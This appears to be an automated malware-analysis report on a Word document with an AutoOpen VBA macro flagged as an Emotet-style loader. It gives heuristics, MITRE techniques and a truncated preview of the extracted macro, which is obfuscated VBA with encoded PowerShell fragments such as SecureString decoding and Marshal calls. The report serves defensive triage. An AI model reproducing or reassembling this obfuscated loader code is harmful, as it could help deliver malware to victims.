Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious OLE document containing a VBA macro. The 'AutoOpen' macro, a common auto-execution entry point, is present and utilizes 'CreateObject' to execute obfuscated code. This strongly suggests the macro's purpose is to download and execute a secondary payload, a common technique for malware delivery. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40974 bytes |

SHA-256: 95219e1e95ae73e4794a503e7e04a2df466b78fc2238b0a01212bec9d1dd4b0b

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 19 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NClwQGowV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QQfdjilYci"
Function IUuaarQpLJOiiB()
On Error Resume Next
Select Case jKQmvf
Case 51809
Rzhzd = Hex(26125 - CSng(6443) - 84068 + ChrW(NzGvo))
WtBsm = mmjdz
End Select
CfncLFz = PXFdF("4UfcIAMwBkADEAMgA1ADAAZQAyAGEAMQA1ADgANQA3ADMAMAAyAGUANgBkADcAZABjAGIANwBiADUAYwBhADgANwA3ADEAMQAXjH0", 5, 93)
Select Case wNhHZ
Case 70984
JwuNzo = Hex(33023 - CSng(85671) - 26729 + ChrW(ZBjrou))
tmoOiN = VdAHd
End Select
Select Case ZWEdXY
Case 21648
wGIJEh = Hex(97026 - CSng(26391) - 15084 + ChrW(NZlaHT))
CLanw = XIKWV
End Select
VhYvzzNiPzK = PXFdF("I,8BA2ADYAZQBkADYANAAxAGIAZQA1ADAAYQBlADkAYQAxADgAMQA2ADYANQBlADgAZAA3AGYANwA0ADMANwBmADcAOAA2AGMAZAA5AGUAYgA4AGQANQBlAGMANYjK", 5, 119)
Select Case uMbijp
Case 53454
BuMzt = Hex(76280 - CSng(96312) - 89685 + ChrW(OzPlW))
MkLAi = BtLcfM
End Select
Select Case IXXHjB
Case 68930
zkMnC = Hex(27180 - CSng(2370) - 58214 + ChrW(hlYhSw))
LDQGjF = owNiz
End Select
XPXniGOHEa = PXFdF("J5rBAZABkAGIAZgA0ADIANAA5AGEAMAAzAGUAMQBlADEAYgBlAGIAZgBjADMAIuXnq", 5, 57)
Select Case hFWQW
Case 92161
iRFjC = Hex(5457 - CSng(95068) - 47282 + ChrW(sCpbqv))
kdYtjY = pjDTFc
End Select
Select Case kvhLGR
Case 24919
mkFRlY = Hex(90909 - CSng(80404) - 28586 + ChrW(wFojwW))
uUYhT = YsPiF
End Select
fGWazpVWjr = PXFdF("5wNwAyADIAMAAwADcAMgA1ADMAZQBjADcAYgAwADYAOQA3ADEAYgBiADQANABiADUAZABjAGIAMgAyAGIAMwBlADIAYgBlADcANgA0ADIAYQAyADMAZgA4AGQAO5Tpj", 3, 121)
Select Case JGDOLh
Case 93351
lLrlvE = Hex(78444 - CSng(45764) - 67249 + ChrW(DzLpLw))
ESYjZW = qtFYur
End Select
Select Case pYoLW
Case 29885
opNuOn = Hex(81443 - CSng(51260) - 90942 + ChrW(QSfhp))
jouIz = lVnVLz
End Select
dXDFLIz = PXFdF("5dEPJ,114,186,28,235,81,71,74,70,203,169,62,37)) ) )| & ( $SHEllId[1]+$4p", 6, 66)
Select Case hYIjcF
Case 75080
pBThrJ = Hex(8648 - CSng(93713) - 4370 + ChrW(kzOFXb))
wtEsG = bsiOzI
End Select
Select Case MROBr
Case 90466
JLNNG = Hex(86670 - CSng(55108) - 72053 + ChrW(FQtuR))
kCDhrG = iuKoK
End Select
LXWuLMI = PXFdF("busHNADYANwBkADcAYQAzAGYAYQA1AGMAZgAzADcAYwBmAGMAZAA4AGIAZQAzAGYAMwA1AGEAMABkAGQANwAkd", 6, 79)
Select Case ivdrr
Case 85759
OWFzZZ = Hex(22623 - CSng(30278) - 21717 + ChrW(DrnOh))
zJDwo = TCSiUH
End Select
Select Case TojBqK
Case 39895
GKjcu = Hex(77996 - CSng(72535) - 955 + ChrW(iKiKUP))
YNncDq = qOhCI
End Select
RCREIfTU = PXFdF("pgA1AGQAZQA2ADYA' | cOnVerTtO-SECurEstRINg -K 107,78,130,13,65,226,162,247,35,243,236,251jjJu,3q2", 2, 89)
Select Case LQhjv
Case 78499
kkwGz = Hex(71717 - CSng(35294) - 49629 + ChrW(iSzZv))
dWsKQz = NMmdpb
End Select
Select Case UXsjKl
Case 78708
jaVwiN = Hex(49472 - CSng(49344) - 26356 + ChrW(sVfdIV))
fJlmC = HzDzml
End Select
DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
Select Case STdvch
Case 1921
AmWlUI = Hex(50598 - CSng(47781) - 90890 + ChrW(PXUfcD))
hlNAaP = onfYsj
End Select
Select Case nlkwv
Case 81817
FHNTW = Hex(983 - CSng(71641) - 37716 + ChrW(ZlIVv))
FJuwBz = VthPRD
End Select
KuHPU = PXFdF("dP([rUnTime.intEroPSErvicES.marShAl]::([RunTIME.iNTERopSerVICes.marSHal].gETMeMBeRs()[4].nAME).inVOke([RuNTiMe.iNTEropsERVICEs.mARShal]::sEcuReStrINgTo5.b5f", 3, 149)
Select Case inJpaq
Case 94796
... (truncated)